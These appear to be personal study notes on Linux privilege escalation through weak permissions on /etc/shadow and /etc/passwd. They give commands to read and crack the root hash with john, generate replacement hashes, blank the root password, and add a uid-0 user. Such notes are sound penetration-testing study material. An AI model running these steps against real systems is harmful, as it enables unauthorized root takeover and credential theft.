45 - Weak File Permissions

# Weak File Permissions The /etc/shadow file contains user password hashes, and by default is not readable by any user except for root. If we are able to read the contents of the /etc/shadow file, we might be able to crack the root user's password hash. If we are able to modify the /etcy/shadow file, we can replace the root user's password hash with one we know. --- ## Readable /etc/shadow file The root users password hash is the first line in the shadow file. We will use the following command to get the root users password hash ```bash $ head -n 1 /etc/shadow ``` ![[Pasted image 20220805003437.png]] The users password hash is between the first and second : The ```$6

`` at the beginning of the hash indicates it was generated using sha512 Move the has to a file called "hash.txt" ```bash $ john --format=sha512crypt --wordlist=/usr/share/wordlist/rockyou.txt hash.txt ``` The above command will attempt to crack the hash using john. --- ## Writable /etc/shadow Run the linux enumeration script with the level set to 1. ```bash $ ./lse.sh -l 1 -i | more ``` ![[Pasted image 20220805010311.png]] This is a list of files our user can write to outside our home directory. ![[Pasted image 20220805085148.png]] The shadow file is world writable. Make a backup of the file so it can be restored later. ```bash ┌──(kali㉿kali)-[~/Downloads] └─$ mkpasswd -m sha-512 newpassword $6$YOGqTN7lonfyBBsP$8Bd7Cf6iaOBH24cc0vL3xVTMM3.MDcCeFW9JJwkp6HveGcPTLsmN56p7dkpWavc1aN0BflTMJj02ZYxOEQKwJ0 ``` Make a new sha512 hash with a known password. --- ## Writable /etc/passwd The /etc/passwd historically contained user password hashes. For backwards compatibility, if the second field of a user row in /etc/passwd contains a password hash, it takes precedent over the hash in /etc/shadow. If we can only append to the file, we can create a new user but assign them the root user ID (0). This works because Linux allows multiple entries for the same user ID, as long as the usernames are different. The root account in /etc/passwd is usually configured like this: ```bash ┌──(kali㉿kali)-[~/Downloads] └─$ cat /etc/passwd root:x:0:0:root:/root:/usr/bin/zsh ``` The "x" in the second field instructs Linux to look for the password hash in the /etc/shadow file. In some versions of Linux, it is possible to simply delete the "x", which Linux interprets as the user having no password. Example below: ```bash root::0:0:root:/root:/usr/bin/zsh ``` To add a password hash to the /etc/passwd file. Generate a password using openssl: ```bash ┌──(kali㉿kali)-[~/Downloads] └─$ openssl passwd "password" XuT2vUIRQ8lwI ``` Edit the /etc/passwd file, and enter the new hash in the second field in the root users row, where there currently should be an x ```bash root:XuT2vUIRQ8lwI:0:0:root:/root:/usr/bin/zsh ``` Alternatively, append a new line to the /etc/passwd file with root user ID, but a new username. ![[Pasted image 20220805092133.png]] ## Backups A user may have created an insecure backup of sensitive files. Some common places to store these files are / (root) directory, /tmp, and /var/backups.